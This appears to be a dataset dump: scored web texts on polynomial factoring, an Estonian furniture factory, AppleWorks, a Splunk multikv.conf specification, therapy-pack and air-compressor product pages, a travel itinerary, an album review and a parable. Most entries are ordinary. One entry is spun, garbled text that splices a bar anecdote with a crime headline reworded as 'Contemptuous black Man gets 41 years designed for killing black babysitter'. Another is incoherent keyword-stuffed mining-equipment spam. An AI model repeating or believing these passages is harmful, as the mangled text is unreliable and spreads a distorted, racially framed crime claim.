proba
float64
0.5
1
text
stringlengths
16
174k
0.999369
How Is the Factoring of Polynomials Used in Everyday Life? The factoring of a polynomial refers to finding polynomials of lower order (highest exponent is lower) that, multiplied together, produce the polynomial being factored. For example, x^2 - 1 can be factored into x - 1 and x + 1. When these factors are multiplied, the -1x and +1x cancel out, leaving x^2 and 1. Unfortunately, factoring is not a powerful tool, which limits its use in everyday life and technical fields. Polynomials are heavily rigged in grade school so that they can be factored. In everyday life, polynomials are not as friendly and require more sophisticated tools of analysis. A polynomial as simple as x^2 + 1 isn't factorable without using complex numbers--i.e., numbers that include i = √(-1). Polynomials of order as low as 3 can be prohibitively difficult to factor. For example, x^3 - y^3 factors to (x - y)(x^2 + xy + y^2), but it factors no further without resorting to complex numbers. Second-order polynomials--e.g., x^2 + 5x + 4--are regularly factored in algebra classes, around eighth or ninth grade. The purpose of factoring such functions is to then be able to solve equations of polynomials. For example, the solution to x^2 + 5x + 4 = 0 are the roots of x^2 + 5x + 4, namely, -1 and -4. Being able to find the roots of such polynomials is basic to solving problems in science classes in the following 2 to 3 years. Second-order formulas come up regularly in such classes, e.g., in projectile problems and acid-base equilibrium calculations. In coming up with better tools to replace factoring, you must recall what the purpose of factoring is in the first place: to solve equations. The quadratic formula is a way of working around the difficulty of factoring some polynomials while still serving the purpose of solving an equation. For equations of second-order polynomials (i.e., of form ax^2 + bx + c), the quadratic formula is used to find the polynomial's roots and therefore the equation's solution. The quadratic formula is x = [-b +/- √(b^2 - 4ac)] / [2a], where +/- means "plus or minus." Notice there is no need to write (x - root1)(x - root2) = 0. Instead of factoring to solve the equation, the solution of the formula can be solved directly without factoring as an intermediary step, though the method is based on factorization. This is not to say that factoring is dispensable. If students learned the quadratic equation of solving equations of polynomials without learning factoring, understanding of the quadratic equation would be reduced. This is not to say that factorization of polynomials is never done outside of algebra, physics and chemistry classes. Handheld financial calculators perform an everyday interest calculation using a formula that is the factorization of future payments with the interest component backed out (see diagram). In differential equations (equations of rates of change), factorization of polynomials of derivatives (rates of change) is performed to solve what are called "homogeneous equations of arbitrary order." Another example is in introductory calculus, in the method of partial fractions to make integration (solving for the area under a curve) easier. These examples are, of course, far from everyday. And when the factoring gets tough, we have calculators and computers to do the heavy lifting. Instead of expecting a one-to-one match between each mathematical topic taught and everyday calculations, look at the preparation the topic provides for more practical study. Factoring should be appreciated for what it is: a stepping stone to learning methods of solving increasingly realistic equations. Dohrman, Paul. "How Is the Factoring of Polynomials Used in Everyday Life?" Sciencing, https://sciencing.com/factoring-polynomials-used-everyday-life-5472075.html. 24 April 2017. Will I Ever Use Factoring in Real Life?
0.994741
Tartu Furniture Factory has one of the first to provide and develop the furniture producers traditions and skills. This is one of the reasons why this company's products were very popular in the Soviet Union. Some interesting references are The Kremlin Congress Palace, Uljanovski Memorial Complex and in 1980 the Olympic regatta objects. In the Furniture Factory sawmill, the log transport and process was fully automated and the saw frames worked remotely. Step by step the factory moved from manual labour to machine production. The effective job management was very important for the company: the job was easier and faster thanks to different assembly lines. During the Furniture Factory times, the main product categories were furniture, lumber, sets of wooden containers and toys. During the Soviet Union times, the factory specialised more on office and cabinet furniture production. Consistently templates for new models were created and the most efficient technology was searched to increase the product selection. Laboratories, these days measurement technique and standardisation services watched over the production technology and helped to improve the quality of the products. The waist was about 10-13% and 90% of it went to the chip production. 18-21% were dust and sawdust, which went to the heating boilers together with inferior chips. 2% was an inevitable technological loss. To conclude the wood was used by 100%. The principles, which were followed by the Furniture Factory days, are still important. How was the nowadays Tarmeko created? In the following list are the most important events in the factory history. In 1947 to 1956. the artell „Puit“ was active and it was combined into the furniture factory during 1956.–1960. In 1969. the Tartu Furniture Factory was created. In the late 80s the Tartu Furniture Factory and Forest Factory were united - this is how Tarmeko was created. Later was this company called RAS Tarmeko, which was a government company. In 1992. the company was privatised. In 2005 the Tarmeko factories were made independent. In the Furniture factory were 972 workers of which 385 (40%) were women. A quarter of the production was sold in Estonia, the rest went to the other Soviet republics. The biggest consumers were Moscow ( 2 million rubles), Tallinn (1,5 million) and Leningrad (400000). In Tartu the turnover was about 111000, which is less than in Bakuu, Novosibirsk, Minsk, Moscow Region, Sverdlovsk and Leningrad region. In the early days, one third of the raw material came from abroad (mainly Karjala or Leningrad region), in the year 1986 it was 2/5. The factory had 33 cars, 23 lifts, 5 cranes and the cars with TMK logo drove yearly about 1 million kilometres. In 2005 five different independent companies were created in the Tarmeko group. Each company is specialised in a certain segment. • TARMEKO PEHMEMÖÖBEL OÜ - while having long-term experience and necessary readyness, Tarmeko Pehmemööbel can make different difficult high quality custom orders. The factory has also their own trademarks, which include a wide selection of deisgn upholstered furniture. Handcraft, quality and long-term endurance are the keywords, which describe Tarmeko Pehmemööbel sofas and armchairs most accurately. • TARMEKO LPD OÜ - the company is specialised in bend plywood component and furniture production. In every day work the production and product development technology improvements and achievements are highly valued, which allows the company to make complete and high-quality solutions. • TARMEKO SPOON AS - the company produces and sells rotary cut veneer and plywood. • TARMEKO METALL OÜ - is the local market leader in producing different fully automated colour and shot peening lines design, installing and startup. The company's key strengths are high quality, versatile skills, flexibility and fast lead times. • TARMEKO KV OÜ - is a company, which deals with real estate management. Tarmeko KV owns the other Tarmeko group factories.
0.938543
Apple Works to run natively on Macintel? I have no idea how Apple Works is written, but i would love to know if it is going to run natively on the new Macintel's when they arrive. It won't run 'natively' but it'll run. It won't ship with the Macintels though...trust me. It doesn't even ship with the current Macs, does it ?? These days you have to buy iWorks if you want such an app (or Office). I would expect iWork to be native for the new machines, but not AppleWorks. It still ships with ibooks, imacs and minis. I would imagine the intel transition must be the death kneel for appleworks. iWork, does not really replace AppleWorks. It has quite a good database programme, which I have made use of and although I now have Filemaker it cannot open the Appelworks files. I thought that if Appleworks could just be re-compiled there was no reason not to include it. I thought that if Appleworks could just be re-compiled there was no reason not to include it. AppleWorks uses a lot of seriously outdated code. It's much more than a simple recompile that it takes to bring it to x86. Furthermore since AppleWorks ran fine on a 100mhz 603e and even lower (back when it was ClarisWorks), Rosetta should have no problem opening it. does anyone here still use appleworks? my dad likes to draw pictures in it. i've always had a student edition of Office X, but i imagine if i didn't i'd switch to it, since it's free, and you can type in it. Good point, I never thought of that, my fears are that Rosetta will be like VPC backwards i.e. one to avoid unless compelled to do so. I think AppleWorks is too old to be recompiled for universal binaries and is not worth re-writting to bring it current. This means that iWork is going to have to be the replacement for the full AppleWorks suite, probably in iWork 06. I have a feeling that work on all modules in iWork had been developed by the time 05 was released, but more time was needed on some areas, leaving Pages and Keynote as the only two to be included in the 05 package. On the spreadsheet side it was probably developing more compatibility with Excel. Hopefully the DB tasks were moving it more towards a FileMaker Jr. design. There are plenty of templates and wizards that could be transferred over,and a few more added. This area should be fairly simple (a task for new programmers) but it can be very important for a lot of basic users. Apple needs to hit iWork hard this year to improve its success in the market.
0.950408
The first bar he visited was above what be usual school-themed and while the year-old says he's not into uniforms, he says he likes young women. The daughter sees his mom and asks, Can you repeat that? were you and Dad doing? Contemptuous black Man gets 41 years designed for killing black babysitter with submachine gun A Brooklyn judge laid into a man convicted of fatally shooting a year-old babysitter with a submachine gun, saying she saw no reason en route for show him mercy before sentencing him to 41 years behind bars Tuesday. Zira was a chimpanzee psychologist after that veterinarian, who specialised in the analyse of humansin the movie series Globe of the Apes.
0.999997
Should citizens provide immigrants with health care? Despite the right to health, few countries ensure that all immigrants receive the same healthcare as citizens. Although immigrants are typically younger and healthier than citizens and often bear the burden of caretaking for citizens and their families, many citizens blame immigrants for their health problems. In turn, nations create exclusionary policies that discriminate against newcomers. Sometimes rich nations have shaped the conditions that drive the global poor to leave their native countries. But one person’s health can affect the health of others and good health can benefit many. Given the public dimensions of health, failure to help newcomers in need of care is not only counterproductive because it puts the health of all at risk, but it also violates basic principles of fairness, reciprocity and justice. Health for all requires solidarity with others.
0.973708
Compressed air isn’t a new concept. As a matter of fact, even the early Romans knew how useful it could be, and created it by running water down a pipe, which forced air out of the bottom and into a furnace to increase the temperature while smelting metal. The upgrade to an air pump happened in 1650 in Germany, then became motorized just before the year 1800 for the use of mining. Since then air compressors have continued to change and has expanded into more uses, and the auto industry wasn’t immune to the power of compressed air. Why are air compressors so valuable to an auto shop? Air compressors work by drawing in air, compressing it with a piston, and forcing it back out through a very narrow valve. The force that is produced can be used to inflate a tire, for use with spray paint guns, or with a wide array of power tools. There are many auto projects that require more power, more torque, more speed, and a body shop air compressor creates that possibility. You just need to have the right attachments. While having all of these attachments on hand is a good idea for any auto shop, you may find yourself using one more than another, depending on the type of work you’re doing. Know which air compressor attachments are compatible with your equipment, and the types of projects you do most frequently. There are several different types of air hoses- different lengths, diameters, adaptors, and materials it’s made from. These differences are important, since they determine whether or not they can be used with your particular air compressor, and whether it will work for your project. For instance, a 10’ braided air hose will fit mini air compressors with fittings that are 1/8” or 1/4” and has a working pressure of 145PSI. This might be great for a smaller shop operating sanders or other power tools, but generally isn’t sufficient for a larger body shop. Or say you’re using a spray paint gun. In general, most sprayers require a hose of either 1/4” or 3/8”, depending on what the air cap requires. Preference also plays a role in the hose you choose, since there are many different types of hoses- short, extra long, and retractable, such as the Ingersoll Rand 50’ Hose Reel, to name a few. In order to connect your air compressor hose to your tools, you need a coupler. Couplers act like joints, twisting and moving with the user to prevent the hose from kinking. They connect your tools and create a seal between all the air compressor parts so there is no loss in pressure, and each part remains in place. And while each joint works the same, for the most part, there are many different types- from a 2 Way Swivel Splitter to a Tire Machine Grip Chuck- and not all of them will work for you. Purchasing the wrong coupler could leave you with pieces that won’t fit together, or won’t connect properly, which could be dangerous. If the wrong coupler is in place, you could risk the pieces shooting off into your shop, posing a safety risk for anything or anyone in the way. Before you buy, examine the mating connector and the internal configuration of the coupler you intend to buy, and make sure that they are compatible. Blow guns are most commonly used in body shops and detailing shops for use after sanding, drilling, painting, or for use in detailing. This is because these air blow guns use intense and pin pointed air to blow away dust, shavings, and other debris from hard to reach areas such as an engine or in the seams of a seat. Having this air tool is great for use in any shop, but there are several different types- some with flexible and rubber tips, others that can be used for air or fluids. The style, reach, and air flow of these guns should be taken into consideration depending on the work you are doing. Auto spray paint guns are useless without an air compressor, which means you should ensure that you have a spray gun that can withstand the pressure, and an air compressor that can deliver the kind of power you need. If your air compressor is too small, it likely won’t deliver the right amount of pressure. Before you purchase a spray gun, always ensure that your air compressor can provide what you need. For more information on matching spray guns and air compressors, read our article “How to Find the Best Air Compressor for Painting Cars”. Air filters remove scale, condensation, rust, and other damaging particles from your hose and attachments- keeping your equipment clean for longer, leading to a longer life. But that’s not all they’re used for. In fact, there are dozens of different filters, and each is suited for different levels of filtrations. Some, such as the Devilbiss Cam Air, offer five stage filtration that removes air and particles up to 40 microns. On the other hand, the 3M Compressed Air Filter is meant to be mounted to a wall, and filters the air being delivered to the compressor from the very beginning. Before you buy, always ensure that you are getting the correct filter for your project, and that it will fit with your compressor. Filters are a great option for most auto body shops, but there are other shops that would benefit from also incorporating an air dryer into their setup. Air dryers are most commonly used in environments with a lot of air contamination (such as gas or paint fumes). These air dryers filter through either refrigeration or desiccant absorption to create pure oxygen and can be used as a way to filter the gasses from your shop for health and benefit of yourself and your employees. Because the size, style, and attachment ability vary, always make sure that you are getting the right filter for your needs. To prevent dangerous fluctuations in pressure output, use a pressure regulator. Having a regulator keeps the pressure of the air flow at your desired or necessary level, no matter what the pressure is inside the tank of the compressor. Sometimes you are able to get your filter and regulator in a single piece rather than as separate attachments. If you want your auto air compressor to continue running efficiently for years, then make sure you have the right lubricant. A great lubricant will help to keep your compressor from overheating and that the seals don’t leaks- both of which would cause the compressor to use more energy. Keeping your compressor in good working condition will keep you working longer, more efficiently, and at reduced costs. You should be concerned with keeping your air compressor and air compressor attachments in working order, but should you ever face issues, know that Auto Body Toolmart has the resources to help. Find your attachments or build your air compressor accessory kit at Auto Body Toolmart! Red Rubber 25 foot Air Hose 3/8"
0.999998
As further proof our whole family swears by our packs – our chocolate lab, Gracie, might just be our biggest fan. Pain, whatever kind it is, is personal. And being cold, just STINKS. Heal ME Handmade Therapy Packs are all handmade in Gray, Maine – especially designed to be used used hot or cold to soothe your deep aches and pains, or just provide comfort and healing. We LOVE making our packs for you – because we believe in them. Our own story starts with chronic pain, migraines, shoulder pain, arthritis, carpal tunnel, TMJ, and trigeminal neuralgia for Mom as the result of a bad car accident, and one ever-so-beautiful-bouncing-colicky-baby-boy (ahem… 17+ years ago). As a result, we make these packs for ourselves and for YOU; we USE them, so we know how we need them to work, and want to share them with you. We’ve been making packs for 20+ years, and selling them direct retail to customers since 2016. This is a family business, and our main purpose is to share with you something that helps deal with pain, warms, calms, cools and soothes. Something you’ll use everyday. Something you’ll leave out on your coffee table and grab every night, or in your desk drawer and use every day. And yes, the now 17-year old uses our corn packs almost daily. You’ll find his knee modeling an ice cold pack and a securing strap in our basic packs photos gallery. Order online now, or find our list HERE of retailers, seasonal fairs and pop-ups throughout the year. Local to our area? Contact us to schedule an appointment to buy direct at our studio in Gray, Maine. Our most popular and primary line of packs are unscented, and filled with natural, clean whole feed corn kernels. Believe it or not, corn provides a deep heat or deep cold experience, lasting longer than rice, flax or buckwheat, clay beads, and even those fake plastic silicone beads you find at big-box retailers. Over time, it “lives” longer and wont break down or begin to smell like other fillers. We believe firmly that corn will give you a better experience – try it, you’ll see what we mean! Available in small, medium, large, XL and the highly coveted ‘Wrap’ size – each designed for use in various areas of your body. That’s the most frequent question we are asked! The answer is NO – if you follow our directions. This is large kernel feed corn, not popping corn. Popping corn is removed from the cob at a young stage so it will pop just like you expect it to. FEED CORN is allowed to grow on the cob much longer, it becomes pitted and is not used for popping corn. Occasionally you may hear a ‘pop’ if you’ve heated it too long, or if your microwave is too strong for the time you’re programed it. It is more likely to burn than pop if you overheat it (again, please follow our directions)! Overall, this kind of corn is much more tolerant and it absorbs the heat or cold, hanging on to it longer. Our RICE PACKS are designed for a “lighter” or “softer” heat or cold experience, so to speak. Rice packs are filled with plain rice, and a special combination of essential oils and herbs are added for an aromatic experience. Available in “Headache Tamer” and “Baby Belly Soother” sizes (you do not need to use them for those purposes). Use any of our packs for whatever you need! I HAVE A RICE PACK, AND IT SMELLS! We believe it. We find that many people have very old rice packs that have been likely overheated, because they want them to get warmer than the rice really can get. Hence, it is probably scorched or burnt inside. Rice also absorbs odors, aside from being easy to burn. Thats why we include essential oils and herbs in ours – and its also why we tell you that our rice packs are meant for a lighter heat experience. Want HOT? Corn is the answer. Want ICE cold? Corn. Want it to hold the heat longer? Corn! We will sell you whatever you like and we do love our rice packs,. But don’t buy a rice pack if you want the corn experience.
0.999888
Your day-by-day itinerary now includes Full House House as well as Palace of Fine Arts Theatre. On the 14th (Mon), wander the streets of Union Square, take in the waterfront at Fisherman's Wharf, and then step off the mainland to explore Alcatraz Island. Get ready for a full day of sightseeing on the next day: don't miss a visit to Full House House, then catch a live performance at Palace of Fine Arts Theatre, then snap pictures at Golden Gate Bridge, and finally stroll through Golden Gate Park. Planning San Francisco trip won't be overwheling when you use's Insprock itinerary maker. New York City to San Francisco is an approximately 9-hour combination of bus and flight. You can also fly; or drive. Traveling from New York City to San Francisco, you'll gain 3 hours due to the time zone difference. While traveling from New York City, expect a bit warmer days and much warmer nights in San Francisco, ranging from highs of 59°F to lows of 46°F. Wrap up your sightseeing on the 16th (Wed) early enough to drive to San Jose. You've added Intel Corp and Museum, Winchester Mystery House, Apple Park Visitor Center, and other attractions to your itinerary. On the 16th (Wed), make a trip to Google Android Lawn Statues, explore the galleries of Intel Corp and Museum, admire the striking features of San Jose City Hall, then examine the collection at The Tech Museum of Innovation, then delve into the mystery of Winchester Mystery House, and finally don't miss a visit to Apple Park Visitor Center. Plan my San Jose trip by asking Inpirock to come up with tips and suggestions. You can drive from San Francisco to San Jose in an hour. Alternatively, you can take a bus; or take a train. In January, daytime highs in San Jose are 61°F, while nighttime lows are 42°F. Finish up your sightseeing early on the 16th (Wed) so you can travel to Los Angeles. Your list of things to see and do now includes Rodeo Drive, Sunset Boulevard, Universal Studios Hollywood, and other attractions. There's lots more to do: see the interesting displays at The Getty Center, look and learn at Griffith Observatory, take a leisurely stroll along Santa Monica Pier, and get to know the fascinating history of Hollywood Walk of Fame. To see traveler tips, where to stay, maps, and tourist information, use the Los Angeles sightseeing planner . You can fly from San Jose to Los Angeles in 3 hours. Other options are to fly; or drive. Expect somewhat warmer temperatures when traveling from San Jose in January; daily highs in Los Angeles reach 70°F and lows reach 49°F. On the 19th (Sat), you'll travel back home.
0.999254
This is a must see movie! It is excellent, you'll laugh out loud and you'll cry. Here is a brief summary of the movie. Hurry and see it so we can talk about it.
0.995915
I have a friend from Cuba who contracted type�1 diabetes around the same time as his town was exposed to a chemical toxin from an accident in a nearby factory. Is it possible that the toxin was responsible in some way for the type 1 diabetes? It is difficult to guess at what the answer might be without knowing what the toxin was and whether your friend actually absorbed any of it or whether there were any other related cases of diabetes. At all events, it is very unlikely that any industrial accident would have caused type�1A (autoimmune) diabetes. Since your friend is Cuban, it is quite probable he has what is now called type�1B diabetes which may have a different etiology, but again there are no reports in the literature that would support this sort of a relationship.
0.99997
Local Mining Equipment in Angola,NY with maps, local business reviews, directions and more. 2. BinQ Mining Equipment copper mining equipment angola, equipment copper mining, copper mine equipment for salecopper mining equipment manufacturer, Argentina mining equipment copper crusher, copper ore mining and quarry equipment india, copper mining equipment mexico, small copper mining equipment, 3. mining equipment in angola africa - yenitip. mining equipment in angola africa_StaffMine International Mining, Engineering, Oil and GasSearch StaffMine International Minning Jobs, Engineering Jobs, Oil and [More]. Dec 21, 2017 · China Diamond Mining Equipment, China Diamond Mining Equipment Suppliers and Manufacturers Directory - Source a Large Selection of Diamond Mining Equipment Products at mining equipment . SINOLINKING 100TPH Diamond Mining Equipment Wash Plant for Angola . Gold diamond mining exploration company, global mining . Supply Chain Manager (Angola) Translate this job post. Supply Chain Manager | Mining . Africa. Job Code: 6982 . Opportunity. Our client, a diamond producer is seeking a Supply Manager to oversee its contracts, purchasing, warehouse as well as logistics departments. The . mining equipment and maintenance angola PROJECT ABOUT US CONTACT US REQUEST A QUOTATIONBYR Industries China Pvt. Ltd. Ball Mill Belt Conveyor BWZ Heavy Duty Apron Feeder CS Cone Crusher Flot. Aug 25, 2018 · Mining seen as option to cut Angola's oil dependence Mining Weekly. Feb 19, 2016 . The West African country of Angola has been badly hit by the . set up and licensed and two more were in the process of being licensed and . the African country produced cement, diamonds, gold (produced by . Reference Number: 9461911NDS Job Description: Reporting to the Mining Manager, the Chief Mining Engineer is responsible to provide strategic and operational expertise to the mine technical functions including planning, survey, geology, drill . drilling equipment mining angola. Minerex Drilling Contractors. Minerex Drilling Contractors Limited is an exploration drilling company with primary interest in West and East Africa. Apr 02, 2018 · Angola to change diamond sector to attract investment: Lourenço . Jun 6, 2018 Angola will make changes to how its secretive diamond industry the big diamond mining companies will return to Angola, Lourenço said. "It got so clear that artisanal mining was taking a big place in the supply chain," Vandeputte said, adding that Umicore buys only from industrial mines, including mines in Congo. coal mining equipment supplier for sale in angola. com – the global information . A profile of Mining in Angola with directories of companies, industry sectors .., people..Mining in Angola – . heavy mining equipment dealers in africa - MTM Crusher in . Find used mining 777D, Mining equipment, . Scope Construction and trading ltd. is the premier heavy construction and mining equipment dealer in East Africa. mining equipment and maintenance angola; mining equipment and maintenance angola. View: PY Cone Crusher. Adopting technology from the world, PY Series spring cone crusher has an excellent performance in secondary.. ??? Get Price. Ball Mill. Feb 22, 2017 · Pig Slaughter House Swine Abattoir Equipment Line For Hog Hoggery Pork Meat . All produts purchased in our company are guaranteed to keep in good repair for . Brazil, Venezuela, Latvia, Australia, Ethiopia, Tanzania, Nigeria Angola ect . .. China wpc equipment China mining equipment line China equip fiberglass. Yanmar Construction Equipment Parts Distributors Angola . Search for construction and mining equipment spare parts in Angola. We love working with construction and mining equipment spare parts customers in Angola (individuals, spares shops, suppliers, dealers, government ministries, companies and corporate sector) and, in the process, figuring out together creative ways for you to use our vast resources to your fullest potential.
0.940716
It’s important to categorize all likely threats to an organization’s internet technology to best address how to avoid/deter these threats. Once these potential threats are made known, categorize them by which threats could be most detrimental to ones that could be least detrimental. Threats with higher possible influence should take priority during preplanning techniques. Keep in mind that the less downtime a threat can be tolerated, the more it will cost to create an appropriate response. Additionally, not all threats require long durations of downtime. To avoid threats to technology, an organization should outline their entire technological infrastructure. Key elements of infrastructure outlining include obtaining resource duplicates while using multiple mainframes and servers to run in the event that production and data facilities fail. Thus, in the case of an active threat, the production system will immediately resort to the local backup source. Because power outages rank among the top IT disruptions, having a reliable back-up infrastructure can make this threat more easily preventable. The possibility for a threat to an organization’s data to occur is unavoidable. Therefore, set service-level expectations and polices should be defined prior to a threat occurring. Service-level agreements can define the uptime and recovery parameters for all of an organization’s data assets. Equally important, management must buy into this exception in order to determine whether a particular asset must be up and running immediately following a disaster such as an outage. Clearly, outlining assets, configurations, and service agreements will help link IT asset performance to business requirements, and provide background in case of system disruptions. After formal policies and procedures are delineated, an organization should test for the plan’s completeness and effectiveness. To ensure that all policies are thorough, they should be retested on a regular basis to make sure that any subsequent changes to the IT infrastructure and business processes haven’t created a need for policy modifications. In addition, organizations should create test beds that accurately reflect day-to-day business conditions, so that drills simulate real-world conditions. While multiple tests can ensure effectiveness, there is no way to totally avoid every disaster contingency. Yet, with the right technologies, clear expectations, practical recovery policies and rigorous testing methods organizations can truly work to minimize negative and detrimental consequences when the unexpected happens to data infrastructure. Overall, having a disaster recovery plan in place a can give a company a competitive edge. A disaster recovery plan should be clear and concise, focusing on key activities/functions required to recover IT services. If an organization plans for the unknown, unplanned events will be much less harmful.
0.989332
What are the characteristics of the Grand Duchy of Luxembourg and its inhabitants? What is typically Luxembourgish? Many say that Luxembourg makes proof of an extraordinary versatility, underlined by its outward look, the diversity of its multicultural society, the regional differences and local particularities, which shape the country into an extremely rich plural society. Start discovering the particularities of the Grand Duchy of Luxembourg!
0.999761
how can we better create tech designed specifically for the elderly? We were looking for ways to increase the positive impact of technology on senior citizen communities and motivate them to pursue healthier lifestyles. We thought long and hard about how to build an integrated system for seniors that would empower them better than existing digital health solutions, recognizing their own ability and agency in improving their own health. After calling our own grandparents for their perspectives, empathizing with the experiences of the senior constituency, and iteratively refining our concept based on what we learned, we determined that focusing on hydration within the context of a communal living situation offered the largest opportunity for impact. The health effects of dehydration are serious, but they are easy to avoid by simply drinking water more frequently. We used an experience design-led approach to develop an integrated community system that would work within existing facilities and amplify positive human factors to improve health. Introducing: Aqualink. Aqualink is a smart water fountain paired with personal water bottles. It recognizes users and provides them individual positive feedback to encourage healthy water intake. It is an iteration towards a more human, more connected future in which technology aids society in subtle ways to improve health. The fountain recognizes when a bottle is placed for fillup, greets the user by name, and provides individualized feedback on water use. Currently these values are hardcoded, but the design calls for expansion to recognize individually tagged water bottles by RFID codes, which the Android phone sensor has the capability to do. Eventually a community progress display will be implemented, leveraging a mechanism by which the healthy habits of the community as a whole can be tracked and tied to real-life rewards, for example, an additional community party or dessert.
0.939092
Why is a multikv field null, even if it is not empty? Multikv extraction - Tables within a table? The following are the spec and example files for multikv.conf. # such as the output of top, ps, ls, netstat, etc. # multikv.conf.example. You must restart Splunk to enable configurations. # not meet your needs. # Define where each section begins and ends. * A line matching this regex denotes the start of this section (inclusive). * Use this if you cannot define a regex for the start of the section. * A line membership test. * Member if lines match the regex. * A line matching this regex denotes the end of this section (exclusive). * Specify the number of lines in this section. * Use this if you cannot specify a regex for the end of the section. # Set processing for each section. * Determines which member lines will be ignored and not processed further. * List of the form: "toReplace" = "replaceWith". * Can have any number of quoted string pairs. * For example: "%" = "_", "#" = "_" * Transform each string into a list of tokens specified by <int-list>. * <int-list> is a list of (offset, length) tuples. <tokenizer> = _tokenize_ <max_tokens (int)> <delims> (<consume-delims>)? * Tokenize the string using the delim characters. * This generates at most max_tokens number of tokens. * -1 for complete tokenization. * 0 to inherit from previous section (usually header). * A non-zero number for a specific token count. * <delims> is a comma-separated list of delimiting chars. as empty values. Defaults to true. * Generates tokens by extracting text aligned to the specified header fields. * header_string: a complete or partial header field value the columns are aligned with. * side: either L or R (for left or right align, respectively). * max_width: the maximum width of the extracted field. of the following delimiters are found: " ", "\t" * Defines a list of static tokens in a section. which misses a header altogether. # This file contains example multi key/value extraction configurations. # pre table starts at "Process..." and ends at line containing "PID" header.replace = "%" = "_", "#" = "_" body.tokens = _tokenize_, 0, " " # drwxr-xr-x 88 john john 2K Jan 30 07:56 . # drwxr-xr-x 15 john john 510B Jan 30 07:49 .. body.tokens = _tokenize_, 0, " "
0.99996
Review Summary: Why doesn't every rock band make music like this? You're meant to begin these sorts of reviews by talking up the band's previous album and giving a bit of context for the one you're reviewing, right" Does anybody mind if I skip that part" The '59 Sound, quietly became one of the defining records of my decade for reasons I don't really think I can explain, despite how much I love it, and how ingrained those songs are into my head after dozens of listens. I know what I'd want to say, but how can you possibly say things like 'I want to scream every single one of the tracks at the top of my lungs from a mountain', or 'every other rock band in their entire country should be ashamed that they're not this good', or 'I basically hated rock music and they changed my mind' without sounding like a pretentious jerk" So how can I even react to a follow-up - how can American Slang even dream of coming up against that" I shouldn't have worried; they've managed it. American Slang is a very subtle step forward from The '59 Sound, conjuring exactly the same thrills from slightly different angles. They're still the archetypal blue-collar all-American rock band given an emotionally sloppy, musically slick post-punk makeover, but here their palettes have broadened beyond Springsteen, Counting Crows, the Americanized end of The Clash, and blue-eyed soul to include the likes of Tom Petty (rather than just name-dropping him), Sam's Town-era Killers, and even (gasp!) foreign sources like Elvis Costello. It's reassuringly familiar, just as everything they've done is, but moments like the guitar solo on "Stay Lucky", the first few seconds of "American Slang", and most of "The Queen of Lower Chelsea" would have sat uncomfortably on the last album, or 2007's debut Sink or Swim for that matter. It's not what I expected, purely because 'subtle' is not a word I'd ever really associate with The Gaslight Anthem. Truthfully their music is anything but; they paint broadly with emotions and stories, balancing the vagueness of their allegories out with selected minor character details ('here's where the angels and devils meet' vs. 'my father had died' on the title track; 'I'm a cannonball to a house on fire' vs. 'what man couldn't love her with that long black hair' on "The Spirit of Jazz"). Springsteen is the obvious comparison to be made there, just as it always was, but frontman Brian Fallon might be better served by being compared to another classic rock megastar - he has the youthful, direct energy of the young Bono, the wisdom of the old Bono, and a consistency neither could ever achieve. His lyrics and his delivery - both of them never less than passionate, sensitive, and full-blooded - are clearly the key to this band, and he still brings his A-game at all times. Time will tell whether this becomes the constant soundtrack to my life that The '59 Sound did. I'm not sure yet; the one thing I will say is that a couple of the tracks here take clear cues from earlier ones ("Stay Lucky" starts in a very similar vein to "The '59 Sound", and the 'Just like a tomb' line in "Old Haunts" is taken from the pre-chorus 'my heart's like a wound' on "Great Expectations"), and on first impression, that indicates that this an album that will remind the listener of other things rather than one they'll enjoy purely on its own merits. There sure are some great moments, though - "Old Haunts" itself offers up a chorus so perfectly judged I almost want to applaud it, and both of "American Slang" and "Stay Lucky" are clearly, effortlessly masterful. Looking at this on a purely objective level, it's almost exactly as good as its older brother; it's actually slightly better, if anything. I really hope that I learn to agree with that assessment subjectively, but even if I don't, this is still a disgracefully good album by a disgracefully good band, and it's nailed-on to be a year-end highlight. Going to get this right now. This review pretty much nailed how I feel about this except I think The '59 Sound is a notch higher for me. But that just goes to say how good that album was. yeah really great review. at first i felt a bit disappointed but it really just needed a little time to sit with me, as it leaked amongst the other huge releases of the early year. "the diamond church street choir" might be my favourite but "stay lucky" and "old haunts" are sooo great. Settling on a 3.5 right now. This lacks much of the energy and catchiness that made the '59 Sound so great. Good review. I was slightly dissapointed by the title track but Im still looking forward to hearing this. Great review Nick. If this even equals 'The '59 Sound', then it will be an excellent album. Love this album. It isn't the '59 Sound, but it doesn't have to be. Maybe it needs more spins but this doesn't come within a galaxy of the '59 Sound. Sink or Swim beats it as well.
0.999213
Everyone leaves twenty-five-year-old Evie Marcherand, but with her naturally husky voice and musical talent she’s done okay, and her star is rising. Her songs and her guitar? Those she can count on. She’s just booked her first three-city tour. Too bad someone else wants to stop her music. Permanently. Jake Wells. 39. Private investigator. Tall and lanky, with brown hair that’s going silver at his temples. What does he want? To go on vacation. But with four younger sisters, “protective” doesn’t begin to describe him, so a promise to a dead man means he’ll play bodyguard instead. Threats of violence against an up-and-coming singer/songwriter have been escalating, and there’s just no way that’s going to happen. But after he gets a taste of Evie Marcherand’s music—and lips—there’s no saying what will. Guarded Star 5 out of 5 based on 0 ratings. 1 reviews. First I want to say wow! This book had everything I love in a romance novel. Feelings of emotions will take you all of over the road, from higher, laughing and cheering to tears running down my cheeks. I love this book. I look forward to reading more from this author. Maybe a book about Conrad??? Hint, Hint. Ms. Ashworth takes the reader on the road with Evie and Jake. You watch how the relationship between them grows from attraction to love, with joy, sadness, and a bit of jealousy wrapped in as well. There is an &quot;About the Author&quot; part at the end of the book, mentioning her father being an author &quot;writing and selling over 300 books&quot;, I think, Christine, if you continue to write in the way you do now, you will have no problem matching or even surpassing your father. Congratulations on the writing of this book. I had problems putting it down, but you know those distractions such as work, and life, kept interrupting. Thank you for the gift of this book, it in no way influenced my love of this book, and look forward to reading more from you in the future. I was given a free copy of this book in exchange for an honest review Thank you for reading my review.
0.924651
One day a rich father took his son on a trip to the country-side with the firm purpose of showing him how poor people can be. They spent a day and a night at the farm of a very poor family. "Did you see how poor people can be?", the father asked. When the little boy was describing what he saw, his father was speechless. His son continued, "Thanks dad for showing me how poor we are!" Isn't it true that it all depends on the way you look at things? The moral of this story is: If you have love, friends, family, health, good humor and a positive attitude towards life, you've got everything! You can't buy any of these things. You can have all the material possessions you can imagine, provisions for the future, etc... but if you are poor of spirit, you have nothing.
0.993211
